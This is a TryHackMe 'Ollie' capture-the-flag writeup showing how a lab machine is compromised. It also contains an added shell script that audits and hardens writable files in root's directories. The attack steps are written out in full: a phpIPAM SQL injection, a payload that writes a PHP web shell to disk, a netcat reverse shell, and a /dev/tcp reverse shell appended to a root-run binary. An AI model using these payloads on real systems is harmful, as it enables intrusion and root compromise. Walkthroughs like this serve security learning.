TryHackMe: Ollie

Today we will take a look at TryHackMe: Ollie. My goal in sharing this writeup is to point you in the right direction if you get stuck. Please try to understand each step and take notes.

Network scan

Command: sudo nmap -sT -p- -T5 -vv -oN nmap/all_ports 10.10.86.146

Port 1337 enumeration

Command: nc IP 1337

Yes, this is a simple chat conversation. At the end of it, we get the credentials we need.

I tried to log in to Ollie with SSH, but it didn’t work.

Let’s take a look at the website now.

It is a simple login page. Let's log in with the credentials we have.

I did some research on phpIPAM, and it turned out that version 1.4.4 is vulnerable to SQL injection.

Let’s check here

Go to the Routing section

Go to the example in the Peer Name section. Click the Actions button and select Subnet mapping.

Now let’s check the vulnerability.

Command: " union select @@version,2,user(),4 -- -

It works. Now let's turn this into RCE.

Command: " union select null,null,null,"<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/backdoor.php" -- -

Now for the reverse shell. Keep in mind that the command must be URL-encoded when you pass it through the cmd parameter in the URL.

Command: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP 4242 >/tmp/f

rm%20-f%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20IP%204242%20%3E%2Ftmp%2Ff%0A

As soon as I received the reverse shell, I changed the user using the previous data.

Privilege Escalation

Command: find / -group ollie 2>/dev/null

There are some interesting results. But this was the most interesting.

After checking it, I saw that it works as root, and I used it to enter the reverse shell command.

Command: echo 'bash -i >& /dev/tcp/IP/4444 0>&1' >> /usr/bin/feedme

And now we are root.
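The escalation above only works because a file that root executes (/usr/bin/feedme) was writable by a non-root group. The following audit helper is an added example, not part of the original writeup: it flags group- or world-writable regular files in the directories root typically executes from, and strips those bits. The directory list in the --run sweep is an assumption about a typical Linux host.

```shell
#!/bin/sh
# Added audit helper (not from the original writeup). It looks for the
# misconfiguration the writeup abuses: a file in a directory that root
# executes from (such as /usr/bin/feedme) that a non-root user or group
# can write to. Run it periodically or as part of an image scan.

# writable_by_others DIR...: print each regular file under the given
# directories that has the group-write or other-write permission bit set.
# -perm /022 matches if ANY of those two bits is set.
writable_by_others() {
    for d in "$@"; do
        [ -d "$d" ] || continue
        find "$d" -xdev -type f -perm /022 -print 2>/dev/null
    done
}

# count_writable DIR...: number of flagged files, handy for alerting.
count_writable() {
    writable_by_others "$@" | wc -l | tr -d ' '
}

# harden_file PATH: remove group/other write bits from one file.
# Returns non-zero if the file is still writable by group or others.
harden_file() {
    chmod g-w,o-w "$1" || return 1
    [ -z "$(find "$1" -maxdepth 0 -type f -perm /022)" ]
}

# Sweep of directories root commonly executes from (assumed list).
if [ "${1:-}" = "--run" ]; then
    dirs="/usr/local/bin /usr/local/sbin /usr/bin /usr/sbin /bin /sbin /etc/cron.d /etc/cron.daily"
    # shellcheck disable=SC2086
    writable_by_others $dirs
    # shellcheck disable=SC2086
    echo "flagged: $(count_writable $dirs) file(s)"
fi
```

Anything flagged in these directories deserves a look at who owns it and what runs it (cron, systemd timers, sudo rules), since appending to such a file is exactly the step the writeup shows.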

"If you have any questions or comments, please do not hesitate to write. Have a good day."


Hello, my name is Elman. I am from Azerbaijan. I wish you a good day.
